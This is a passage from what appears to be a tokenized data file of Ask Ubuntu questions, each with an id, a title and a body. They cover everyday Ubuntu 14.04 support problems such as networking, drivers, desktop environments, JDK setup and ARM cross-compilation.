, found = false ) ; typedef void type ; } ; ^ ... ... . /usr/include/boost/graph/detail/adjacency_list.hpp:1504:89 : error : no type named ‘type’ in ‘struct boost : :lookup_one_property < boost : :property < boost : :vertex_bundle_t , vertexproperties > , boost : :vertex_bundle_t > ’ ... . /usr/include/boost/pending/property.hpp:158:10 : error : ambiguous class template instantiation for ‘struct boost : :lookup_one_property_internal < boost : :property < boost : :edge_bundle_t , edgeproperties > , boost : :edge_bundle_t , void > ... . i use the version 1.54.01 of boost . i realy have no idea of how to manage this problem . so if you have any suggestion i will be very grateful . kind regards
520087	how to get the uboot log file of pandaboard ?	i 'm using ubuntu12.04 with 64 bit.i 'm doing my project on pandaboard es.i flashed the mlo , u-boot.bin to sdcard.it is working properly . but i want to take the log file for booting sequence.is there any way to take log file. ? ?
520094	xubuntu logs me out as soon i login , however i can login as guest	this happened after i rebooted after an update and i ca n't seem to figure out what is causing it . i 've tried removing xauthority with no success .
520095	is it harmful to install a lighter desktop environtment ( xfce ) on ubuntu 14.04 ?	i am to install xfce , because the default ( unity desktop ) on ubuntu 14.04 runs pretty slow on my lenovo z570 laptop . is it really recommended to keep the default desktop environment ? i googled a little bit for the answer and found this . so my question is , is it ( in any way ) a harm to the computer , if i install xfce desktop alongside unity ?
520097	install ubuntu too big	i am currently trying to install ubuntu 14.04 on a thinkpad t440p . i have gotten the point where i can install but everything on the screen is so big that i can not click `` continue '' and do not have another way of proceeding . is there a way to resize the screen ? i have tried displays but there are not many options i can reach . any advice is appreciated .
520098	how do i type umlauts etc in xubuntu 14.04 ?	i 've been experimenting with 14.04 ( xubuntu , xfce , etc ) , and so far have n't been able to make sense of any of the messages saying how to enter characters marked by things like umlauts , accents , etc . is there a beginner 's guide for how to do this right ? one problem is that all the answers i 've seen seem to say something like `` settings→ keyboard → ... '' or `` system→preferences → ... '' , and with the window manager i see on the screen , i ca n't find anything that matches any of these . is there a way to translate such instructions into xfceese ? i 've also seen instructions to configure a compose key , but my keyboard does n't have a key with that text . i 'm guessing that there 's a way to map this to some actual physical key , but i have n't yet stumbled across instructions that work . also , some other systems ( e.g . my macbook pro ; - ) have a little on-screen keyboard that shows what chars i 'll get if i press a key , and for control keys like shift , alt , etc , rewrites the little window to show what they do to the char codes . i 'm guessing that xubuntu has something like this hidden somewhere , but i ca n't guess what it 's called , and have n't found it by poking around in things labelled `` keyboard '' . does it exist somewhere ? such tools are really handy for learning how to type the input you want on a system you 're not familiar with . ( and why , when i enter `` umlaut diaresis '' in this site 's search widget , does it tell me there 's no match ? just `` umlaut '' by itself returns lots of stuff that 's utterly irrelevant , but trying to narrow the search simply results in total failure . ; - )
520103	14.04 vbox guest crashes on login if 3d acceleration is enabeld	using virtualbox 4.3.14 r95030 and matching vbox additions in guest ( ubuntu 14.04 ) . guest instance crashes right after login , if 3d acceleration is enabled for guest os : '' unknown software exceprion ( 0xc0000094 ) occured on 0x2557aeff ... if unchecked , guest runs but extremely slow . my system specs : host : windows 8.1 64bit , guest : ubuntu 14.04 64bit intel core i7-4500u cpu @ 1.80ghz , 8gb ram . this notebook ( sony vaio ) seems to have two graphics cards : - intel hd graphic family ( i have no further info about it ) - nvidia geforce gt 740m
520104	hello i want to mine with minerd , i have the file , but i do n't know the options	i have ubuntu 14.04.1 lts . i want to learn how to mine bitcoins . when i execute the file i do n't know the options . ./minerd ./minerd : no url supplied try `minerd -- help ' for more information . guide
520106	downgrading php from 5.5 to 5.3 on ubuntu 14.04	now , i know that this question has been asked tons of times over the internet , but i followed lots of tutorials on the argument without being able to get to the answer . this is my situation : ubuntu server 14.04 newly updated on the customer 's machine php version 5.5.9 that came pre-installed with the server curl version 7.35 that i installed for the needs of my php script a php script that needs php 5.3.28 and curl 7.35 to run properly . i 've done that in windows , it runs smoothly . but now , in ubuntu , i ca n't seem to find any solution . i uninstalled php 5.5 and than tried to reinstall php 5.3 , no errors in the procedure , but nothing is installed in the end ( not even php-cli ) , in fact running apt-get install php5 will do the trick and reinstall php 5.5 ! i also tried to fall back to 12.04 , but that way curl rolled back at 7.22 . i 've been struggling for hours , and i hope that someone can give me a hint on how to proceed . tia , riccardo
520107	how to kill a script running in terminal , without closing terminal ( ctrl + c does n't work ) ?	i have written a bash script that calls several other programs and executes a bunch of commands . i run this script from the terminal . now i want to kill the script . pressing ctrl + c sometimes does n't cut it , i think because sometimes the script is executing another program , and for some reason the kill signal does n't work . however , if i close the terminal window , it kills the script . is there something i can do ( a keyboard combination ) , that is analogous to closing the terminal window , without actually closing the terminal window ( i do n't want to lose command history , current directory , output history , etc . ) ?
520108	wifi working but wired connection not working : ubuntu 14.04	i have successful connection through wifi in both ubuntu and windows . ( i have dual boot : ubuntu 14.04 installed & upgraded to 14.04.1 and windows 8.1 ) but i have problem in wired connection in ubuntu only ( though it works fine in windows ) . i have consulted here but no luck . i think i have some problem in setting ip address statically from ubuntu side . the connection is shown but i can not access the internet and even not gateway ( i mean 192.168.1.1 ) . i followed the way described here : so my networkmanager.conf looks like : [ main ] plugins=ifupdown , keyfile # dns=dnsmasq [ ifupdown ] managed=true but i removed other part that were by default . and my interface is like : auto lo iface lo inet loopback iface eth0 inet static address 192.168.1.102 # i have seen from windows that it 's 1.102 gateway 192.168.1.1 # 1.1 is because i use 192.168.1.1 to access router settings netmask 255.255.255.0 dns-nameservers 8.8.8.8 8.8.4.4 and i used following to restart new settings sudo service network-manager restart sudo service networking restart sudo service resolvconf restart now i have ifconfig -a eth0 link encap : ethernet hwaddr 98:4b : e1 : a2:2f : fa inet addr:192.168.0.102 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :9a4b : e1ff : fea2:2ffa/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1089 errors:0 dropped:0 overruns:0 frame:0 tx packets:644 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:77228 ( 77.2 kb ) tx bytes:72394 ( 72.3 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:4756 errors:0 dropped:0 overruns:0 frame:0 tx packets:4756 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1240162 ( 1.2 mb ) tx bytes:1240162 ( 1.2 mb ) wlan0 link encap : ethernet hwaddr e0:2a:82 : fa : e9 : f8 broadcast multicast mtu:1500 metric:1 rx packets:1997 errors:0 dropped:0 overruns:0 frame:0 tx packets:2675 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1085963 ( 1.0 mb ) tx bytes:348905 ( 348.9 kb ) route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.0.1 0.0.0.0 ug 0 0 0 eth0 192.168.0.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 ping -c3 192.168.1.1 ping 192.168.1.1 ( 192.168.1.1 ) 56 ( 84 ) bytes of data . from 192.168.0.102 icmp_seq=1 destination host unreachable from 192.168.0.102 icmp_seq=2 destination host unreachable from 192.168.0.102 icmp_seq=3 destination host unreachable -- - 192.168.1.1 ping statistics -- - 3 packets transmitted , 0 received , +3 errors , 100 % packet loss , time 1999ms pipe 2 ping -c3 4.2.2.2 ping 4.2.2.2 ( 4.2.2.2 ) 56 ( 84 ) bytes of data . from 192.168.0.102 icmp_seq=1 destination host unreachable from 192.168.0.102 icmp_seq=2 destination host unreachable from 192.168.0.102 icmp_seq=3 destination host unreachable -- - 4.2.2.2 ping statistics -- - 3 packets transmitted , 0 received , +3 errors , 100 % packet loss , time 1999ms pipe 3 and after following the link i have new settings ( previous was autoethernet and new one i got is ifeth ( up ) . i guess i should try connecting the ifeth0 ( up ) ) . thank you for your time ! !
520110	hybird graphics - drivers installation	quick translation : good morning my name is jorge andres barrios and am new to the linux os . i have had many problems with installing drivers on my pc ; my computer is an hp pavilion dm4 with hybrid graphics . these are the details of my graphics card : 00 : 02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) 01 : 00.0 vga compatible controller : advanced micro devices , inc. [ amd / ati ] robson ce [ radeon hd 6370m / 7370m ] i want to install the propirietary ati driver , as i have read that they are very good , but whenever i install them , my computer is only able to start in dos mode . i hope i can contribute to the topic , since i am new to linux and i would like to learn more . original text : buenos dias ; mi nombre es jorge andres barrios y soy nuevo con el s.o linux , he tenido muchos inconvenientes con el tema de la instalacion de drivers en mi pc ; mi computador es un hp pavilion dm4 con una tarjeta grafica hibrida . estos son los datos de mi tarjeta grafica : 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] robson ce [ radeon hd 6370m/7370m ] quiero instalar los driver ati , ya que he leido que son muy buenos ; pero siempre que realizo una instalacion se me da単a el video y el equipo unicia en modo dos espero que me puedan colanborar con el tema , ya que soy nuevo en linux y quiero aprender mucho de el
520111	how to arrange this file properly ?	i 'd prefer to edit testfile in place to get the desired output . how could i do this ? this is a work box so i 'd prefer to not have to install additional packages . testfile : randomcollege-nt\jsmith90 randomcollege-nt\aakhbar91 randomcollege-nt\pmanning92 randomcollege-nt\dvader93 jshephard94 bwayne95 desired output : jsmith90 aakhbar91 pmanning92 dvader93 jshephard94 bwayne95
520117	connected to wifi but no internet access ubuntu 14.04 lts	please resolve this issue . need assistance , try lot of ways . # # # # # # # # # # wireless info start # # # # # # # # # # report from : 04 sep 2014 21:19 ist +0530 script from : 30 aug 2014 19:00 utc +0000 # # # # # release # # # # # distributor id : ubuntu description : ubuntu 14.04.1 lts release : 14.04 codename : trusty # # # # # kernel # # # # # linux 3.13.0-32-generic # 57-ubuntu smp tue jul 15 03:51:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux parameters : ro , quiet , splash , vt.handoff=7 # # # # # desktop # # # # # ubuntu # # # # # lspci # # # # # 04:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11bgn wireless network adapter [ 14e4:4727 ] ( rev 01 ) subsystem : dell inspiron m5010 / xps 8300 [ 1028:0010 ] kernel driver in use : wl 09:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 03 ) subsystem : dell device [ 1028:0413 ] kernel driver in use : r8169 # # # # # lsusb # # # # # bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 0c45:6417 microdia integrated webcam bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub # # # # # pcmcia card info # # # # # # # # # # rfkill # # # # # 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no # # # # # lsmod # # # # # dell_wmi 12761 0 sparse_keymap 13948 1 dell_wmi wl 4207846 0 lib80211 14381 2 wl , lib80211_crypt_tkip cfg80211 484040 1 wl wmi 19177 1 dell_wmi # # # # # interfaces # # # # # auto lo iface lo inet loopback # # # # # ifconfig # # # # # eth0 link encap : ethernet hwaddr < mac addr eth0 > inet addr:192.168.0.103 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :f24d : a2ff : fe4e:7eed/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:27625 errors:0 dropped:0 overruns:0 frame:0 tx packets:18026 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:34838472 ( 34.8 mb ) tx bytes:1777622 ( 1.7 mb ) wlan0 link encap : ethernet hwaddr < mac addr wlan0 > inet addr:192.168.0.102 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :5eac:4cff : fe99:96c/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:444 errors:0 dropped:0 overruns:0 frame:14316 tx packets:200 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:65644 ( 65.6 kb ) tx bytes:25274 ( 25.2 kb ) interrupt:17 # # # # # iwconfig # # # # # eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11abg essid : '' algo '' mode : managed frequency:2.432 ghz access point : < mac addr algo > retry long limit:7 rts thr : off fragment thr : off power management : off # # # # # route # # # # # kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.0.1 0.0.0.0 ug 0 0 0 eth0 192.168.0.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 192.168.0.0 0.0.0.0 255.255.255.0 u 9 0 0 wlan0 # # # # # resolv.conf # # # # # nameserver 192.168.0.1 nameserver 127.0.1.1 # # # # # nm-tool # # # # # networkmanager tool state : connected ( global ) - device : eth0 [ auto ethernet ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : wired driver : r8169 state : connected default : yes hw address : < mac addr eth0 > capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on ipv4 settings : address : 192.168.0.103 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.0.1 dns : 192.168.0.1 - device : wlan0 [ algo ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : wl state : connected default : no hw address : < mac addr wlan0 > capabilities : speed : 65 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) nirmal : infra , < mac addr nirmal > , freq 2412 mhz , rate 54 mb/s , strength 50 wpa wpa2 srtech : infra , < mac addr srtech > , freq 2462 mhz , rate 54 mb/s , strength 39 wpa2 *algo : infra , < mac addr algo > , freq 2432 mhz , rate 54 mb/s , strength 100 wpa wpa2 ipv4 settings : address : 192.168.0.102 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.0.1 dns : 192.168.0.1 # # # # # networkmanager.state # # # # # [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true # # # # # networkmanager.conf # # # # # [ main ] plugins=ifupdown , keyfile , ofono dns=dnsmasq no-auto-default= < mac addr eth0 > , [ ifupdown ] managed=false # # # # # iw reg get # # # # # country 00 : ( 2402 - 2472 @ 40 ) , ( 3 , 20 ) ( 2457 - 2482 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 2474 - 2494 @ 20 ) , ( 3 , 20 ) , no-ofdm , passive-scan , no-ibss ( 5170 - 5250 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 5735 - 5835 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss # # # # # iwlist channels # # # # # eth0 no frequency information . lo no frequency information . wlan0 26 channels in total ; available frequencies : channel 01 : 2.412 ghz channel 02 : 2.417 ghz channel 03 : 2.422 ghz channel 04 : 2.427 ghz channel 05 : 2.432 ghz channel 06 : 2.437 ghz channel 07 : 2.442 ghz channel 08 : 2.447 ghz channel 09 : 2.452 ghz channel 10 : 2.457 ghz channel 11 : 2.462 ghz channel 12 : 2.467 ghz channel 13 : 2.472 ghz channel 14 : 2.484 ghz channel 36 : 5.18 ghz channel 38 : 5.19 ghz channel 40 : 5.2 ghz channel 42 : 5.21 ghz channel 44 : 5.22 ghz channel 46 : 5.23 ghz channel 48 : 5.24 ghz channel 149 : 5.745 ghz channel 153 : 5.765 ghz channel 157 : 5.785 ghz channel 161 : 5.805 ghz channel 165 : 5.825 ghz current frequency:2.432 ghz ( channel 5 ) # # # # # iwlist scan # # # # # channel occupancy : 1 wlaps on frequency:2.412 ghz ( channel 1 ) 1 wlaps on frequency:2.432 ghz ( channel 5 ) 1 wlaps on frequency:2.462 ghz ( channel 11 ) eth0 interface does n't support scanning . lo interface does n't support scanning . wlan0 scan completed : cell 01 - address : < mac addr algo > channel:5 frequency:2.432 ghz ( channel 5 ) quality=70/70 signal level=-17 dbm encryption key : on essid : '' algo '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 9 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=0000000000000000 extra : last beacon : 52ms ago ie : wpa version 1 group cipher : tkip pairwise ciphers ( 2 ) : tkip ccmp authentication suites ( 1 ) : psk ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : tkip ccmp authentication suites ( 1 ) : psk cell 02 - address : < mac addr srtech > channel:11 frequency:2.462 ghz ( channel 11 ) quality=26/70 signal level=-84 dbm encryption key : on essid : '' srtech '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 12 mb/s ; 24 mb/s ; 36 mb/s bit rates:9 mb/s ; 18 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=0000000000000000 extra : last beacon : 52ms ago ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk preauthentication supported cell 03 - address : < mac addr nirmal > channel:1 frequency:2.412 ghz ( channel 1 ) quality=43/70 signal level=-67 dbm encryption key : on essid : '' nirmal '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 48 mb/s mode : master extra : tsf=0000000000000000 extra : last beacon : 52ms ago ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk ie : wpa version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk # # # # # module infos # # # # # [ wl ] filename : /lib/modules/3.13.0-32-generic/updates/dkms/wl.ko license : mixed/proprietary srcversion : ff25fe784dc6bdff69dafcb depends : cfg80211 , lib80211 vermagic : 3.13.0-32-generic smp mod_unload modversions parm : wl_txq_thresh : int parm : oneonly : int parm : piomode : int parm : instance_base : int parm : nompc : int parm : intf_name : string # # # # # module parameters # # # # # # # # # # /etc/modules # # # # # lp rtc # # # # # blacklists # # # # # [ /etc/modprobe.d/blacklist-ath_pci.conf ] blacklist ath_pci [ /etc/modprobe.d/blacklist-bcm43.conf ] blacklist b43 blacklist b43legacy blacklist ssb blacklist bcm43xx blacklist brcm80211 blacklist brcmfmac blacklist brcmsmac blacklist bcma [ /etc/modprobe.d/blacklist.conf ] blacklist evbug blacklist usbmouse blacklist usbkbd blacklist eepro100 blacklist de4x5 blacklist eth1394 blacklist snd_intel8x0m blacklist snd_aw2 blacklist i2c_i801 blacklist prism54 blacklist bcm43xx blacklist garmin_gps blacklist asus_acpi blacklist snd_pcsp blacklist pcspkr blacklist amd76x_edac blacklist acer_wmi # # # # # rc.local # # # # # exit 0 # # # # # udev rules # # # # # [ /etc/udev/rules.d/70-persistent-net.rules ] # pci device 0x10ec:0x8168 ( r8169 ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac addr eth0 > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # pci device 0x14e4:0x4727 ( brcmsmac ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac addr wlan0 > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan0 '' # # # # # dmesg # # # # # [ 11.430844 ] wl : module license 'mixed/proprietary ' taints kernel . [ 11.433775 ] wl : module verification failed : signature and/or required key missing - tainting kernel [ 11.473771 ] info @ wl_cfg80211_attach : registered cfg80211 phy [ 11.543243 ] wlan0 : broadcom bcm4727 802.11 hybrid wireless controller 6.30.223.141 ( r415941 ) [ 225.370056 ] wl 0000:04:00.0 : no hotplug settings from platform [ 439.263426 ] init : networking post-stop process ( 3829 ) terminated with status 100 [ 1860.097802 ] error @ wl_dev_intvar_get : error ( -1 ) [ 1860.097810 ] error @ wl_cfg80211_get_tx_power : error ( -1 ) # # # # # # # # # # wireless info end # # # # # # # # # # # #
520121	ubuntu sony vaio vpcz 133	i tried to install ubuntu 14.04 on my sony vaio vpcz 133 . it freezes after login into the system . so i go back and install the 12.04 , works great . i 'm planning to install the laptop mode tools on it . for that reason i need a cpu frequency driver , the intel_pstate module in the kernel is for sandybridge + , my laptop has the first generation i5 in it which is just one generation before sandybridge : nehalem . i 'm wondering which driver is suitable in this case ? thanks
520122	i have an asus laptop with ubuntu installed on the 500gb hdd but i want it to boot from the 24gb ssd ? how can i do this ?	this is driving me crazy . i can not figure it out . try and explain in simple terms or send a video ?
520124	xdg-open equivalent for opening file manager for all variants ?	i 'm looking for the equivalent of this command : xdg-open /home/file.txt not to open gedit , leafpad or kate , but to open a file manager , like nautilus , thunar or dolphin . is a such command exist ? thanks
520125	14.04 update problem with executable file mode	here 's the problem : i create a file called foo.pl containing # ! /usr/bin/perl as the top line i execute chmod u+x foo.pl i type ./foo.pl at the command prompt and get the following bash : ./foo.pl : permission denied foo.pl at the command prompt issues the same error the execute bit on the fill is set -rwxrw-r -- 1 myname mygroup 73 sep 4 12:29 foo.pl any ideas ?
520126	jdk 8 installation for ubuntu 14.04 ( android studio & netbeans )	i downloaded jdk-8u11-nb-8-linux-i586.sh and installed it in my home folder . then i install netbeans , it is successful i think because i can compile my java code using netbeans . now when i install android studio , it says no jdk found . please validate either studio_jdk , jdk_home or java_home environment variable points to valid jdk installation . i tried adding environmental variables , export java_home=/home/port8080/jdk1.8.0_11/bin/java export path= $ path : /home/port8080/jdk1.8.1.0_11/bin but when i tried java -version my installed jdk is still not detected . now i am going to install java via apt-get . is it okay to install via apt-get at the same time i already installed it in home ? how can i fix this so i can work with netbeans which requires jdk from my home folder ? i am also , thinking that when i finish installing jdk via apt-get it will install in /usr/ .
520129	after installing xfce environtment on ubuntu 14.04 , default unity environment became lighter	i do n't know if this has an effect on the system , but after i installed the xfce desktop environment , i feel that my default unity desktop is lighter somehow . and the font in unity looks smaller . does the xfce package have any effect on this ?
520130	manually setting skip distance for totem	is there a way to manually set the skip distance in totem when using the left/right arrow keys besides the default -15s/+60s ( -5s/+15s when used with shift ) like one could on vlc ( not to mention setting the hotkeys themselves ) ?
520138	unable to locate package libqt5serialport5	currently i am using the ubuntu 12.04 lts . however , i had this issue of locating the specific package 'libqt5serialport5 ' . have tried the method using sudo -aptget install but still unable to find that particular package . anyone mind helping me ? thanks
520139	upgrade to 14.04 interrupted and now cant get to login screen	i was upgrading from 12.04 to 14.04.it got interrupted and now i cant get to login screen . i see the following on a black screen . could not write bytes : broken pipes : *stopping anac ( h ) ronistic cron *stopping save kernel messages *not starting jetty edit etc/default/jetty and change no_start to be 0 ( or comment it out ) *modprobe vbox failed.please use dmesg to find out why *no jdk found-please set java_home mountall : disconnected from plymouth
520140	need help making my second hdd a system wide mount in ubuntu 14.04 server	okay so long story short i set up my ubuntu 14.04 server as a time machine backup to back up my mac computers . i bought a 2tb wd red drive to use for back ups . my macbook recognizes the time machine but i keep getting `` osstatus error 2 '' when trying to connect to it and this has to do with permissions on the drive . right now my wd red hdd location is /media/server ( i named it server ) and /media means its user specific i need it to be a system wide mount which is /mnt i believe . when i go into the disks program and click on the wheel the `` edit mount options '' is faded so i ca n't click on it . it also says `` 2.0tb unknown '' where its suppose to show the partitions , i was wondering what i did wrong ? my main drive which has ubuntu installed on it , and also a windows partition from my old computer i can change mount options fine its just this drive . i think i may have installed or formatted it wrong or something how can i fix this so i can system wide mount it ? thank you in advance
520142	enable touchscreen on lenovo yoga 11s ubuntu 14.04	hey i just installed ubuntu 14.04 on my lenovo yoga 11s ( ivybridge ) , when i first ran the installation , the touch pad did n't work but the touchscreen did , i foolishly tried to install to an sd card just to found out i could n't boot from it . so second time around i ran the installation process touch pad did work ! but i did n't realize touchscreen was n't until after installed . i used the whole disk on the installation and i 'm already updated till today . things like touchpad and wi-fi are the ones i can find useful information on this model ( cause are the ones with reported issues ) . anyone knows how to enable the touchscreen ? i 'm pretty sure its supported cause i already used it the first time and apparently i 'm the only one without it working . thanks a lot !
520143	what is a timestamp in linux ?	while reading about linux i got the following : touch provides several options , but here is one of interest : the -t option allows you to set the date and time stamp of the file . to set the time stamp to a specific time : $ touch -t 03201600 myfile this sets the file , myfile 's , time stamp to 4 p.m. , march 20th ( 03 20 1600 ) . here , i am not getting the logic behind 03201600 -- > 4pm , march 20th .
520144	‘yowsup-cli.config’ problem	cp : can not create regular file ‘yowsup-cli.config’ : permission denied this line pops up while downloading software to install whatssup thank you for your help . regards
520152	extract a folder from duplicity archive	using the duplicity command , i need to specify the following : specify folder to restore indicate time and date from which to restore from indicate the destination to restore to how can a specify these 3 things using the duplicity command ?
520153	testphp.php 404 not found	i installed lamp server . i can access http : //localhost . i can also run successfully phpmyadmin . but when i go to http : //localhost/testphp.php , i get a 404 not found . the file is in /var/www/testphp.php . the file reads : < ? php phpinfo ( ) ; ? > . this information was taken from the guide : https : //help.ubuntu.com/community/apachemysqlphp . what am i doing wrong ? thanks in advance .
520154	apple wireless keyboard does not work	i ca n't write anythying with my apple wireless keyboard.i am using ubuntu 14.04 and my computer recognizes only keys u , i , o , j , k , l and three others but it writes numbers .
520158	any plans to enable local time from system menu in future versions to address dual boot time sync issues ?	many users seem to have had dual boot trouble when win keeps local time and ubuntu uses utc . various ubuntu and linux discussion groups offer a terminal solution for changing utc=yes to utc=no , but some of these solutions seem to be outdated and do n't work on 14.04 lts . it would be much easier if there was a system menu item , and/or a menu item accessible from the drop-down menu from the clock in the upper right of the screen , which might allow users to address this problem without using a terminal solution that worked in version 12 or 13 , but might not be up to date . are there any plans in the ubuntu community to create a system menu or clock drop-down option fix ? the terminal scripts i have tried have not worked in my 14.04 , and more user-friendly options would be most helpful . thank you .
520160	skipping incompatible error when compiling mysql library using arm-linux-gnueabihf	all problems posted related to mysql library use standard gcc compiler . however , i need to compile a project running on a beaglebone black device . hence , i am using arm-linux-gnueabihf-gcc instead of gcc . here is my environment : ubuntu - 32 bit using eclipse luna c++ mysql running fine on beaglebone . now , i am writing code to access mysql using c++ . please help to fix my error . thanks compiling using a standard gcc works fine , so it means i already installed apt-get install libmysqlclient-dev apt-get install libmysqlcppconn-dev apt-get install mysql-client apt-get install mysql-server so , this is what i get after compiling : 12:38:15 **** incremental build of configuration debug for project arm2 **** make all building file : ../src/arm2.cpp invoking : gcc c++ compiler arm-linux-gnueabihf-g++ -i/usr/arm-linux-gnueabihf/include/mysql -i/usr/arm-linux-gnueabihf/include/mysql/cppconn -i/usr/arm-linux-gnueabihf/include/c++/4.8.2 -o0 -g3 -wall -c -fmessage-length=0 -mmd -mp -mf '' src/arm2.d '' -mt '' src/arm2.d '' -o `` src/arm2.o '' `` ../src/arm2.cpp '' ../src/arm2.cpp : in function ‘int main ( ) ’ : ../src/arm2.cpp:32:10 : warning : variable ‘driver’ set but not used [ -wunused-but-set-variable ] driver *driver ; ^ finished building : ../src/arm2.cpp building target : arm2 invoking : gcc c++ linker arm-linux-gnueabihf-g++ -l/usr/arm-linux-gnueabihf/lib -l/usr/arm-linux-gnueabihf/libsf -l/usr/lib/mysql -l/usr/lib -o `` arm2 '' ./src/arm2.o -lmysqlcppconn /usr/lib/gcc-cross/arm-linux-gnueabihf/4.8/../../../../arm-linux-gnueabihf/bin/ld : skipping incompatible /usr/arm-linux-gnueabihf/lib/libmysqlcppconn.so when searching for -lmysqlcppconn /usr/lib/gcc-cross/arm-linux-gnueabihf/4.8/../../../../arm-linux-gnueabihf/bin/ld : skipping incompatible /usr/lib/libmysqlcppconn.so when searching for -lmysqlcppconn /usr/lib/gcc-cross/arm-linux-gnueabihf/4.8/../../../../arm-linux-gnueabihf/bin/ld : skipping incompatible /usr/lib/libmysqlcppconn.a when searching for -lmysqlcppconn /usr/lib/gcc-cross/arm-linux-gnueabihf/4.8/../../../../arm-linux-gnueabihf/bin/ld : skipping incompatible /usr/lib/gcc-cross/arm-linux-gnueabihf/4.8/../../../../arm-linux-gnueabihf/lib/../lib/libmysqlcppconn.so when searching for -lmysqlcppconn /usr/lib/gcc-cross/arm-linux-gnueabihf/4.8/../../../../arm-linux-gnueabihf/bin/ld : skipping incompatible /usr/lib/../lib/libmysqlcppconn.so when searching for -lmysqlcppconn /usr/lib/gcc-cross/arm-linux-gnueabihf/4.8/../../../../arm-linux-gnueabihf/bin/ld : skipping incompatible /usr/lib/../lib/libmysqlcppconn.a when searching for -lmysqlcppconn /usr/lib/gcc-cross/arm-linux-gnueabihf/4.8/../../../../arm-linux-gnueabihf/bin/ld : skipping incompatible /usr/lib/gcc-cross/arm-linux-gnueabihf/4.8/../../../../arm-linux-gnueabihf/lib/libmysqlcppconn.so when searching for -lmysqlcppconn /usr/lib/gcc-cross/arm-linux-gnueabihf/4.8/../../../../arm-linux-gnueabihf/bin/ld : skipping incompatible //usr/lib/libmysqlcppconn.so when searching for -lmysqlcppconn /usr/lib/gcc-cross/arm-linux-gnueabihf/4.8/../../../../arm-linux-gnueabihf/bin/ld : skipping incompatible //usr/lib/libmysqlcppconn.a when searching for -lmysqlcppconn /usr/lib/gcc-cross/arm-linux-gnueabihf/4.8/../../../../arm-linux-gnueabihf/bin/ld : skipping incompatible /usr/arm-linux-gnueabihf/lib/libmysqlcppconn.so when searching for -lmysqlcppconn /usr/lib/gcc-cross/arm-linux-gnueabihf/4.8/../../../../arm-linux-gnueabihf/bin/ld : can not find -lmysqlcppconn collect2 : error : ld returned 1 exit status make : *** [ arm2 ] error 1 12:38:18 build finished ( took 2s.451ms )
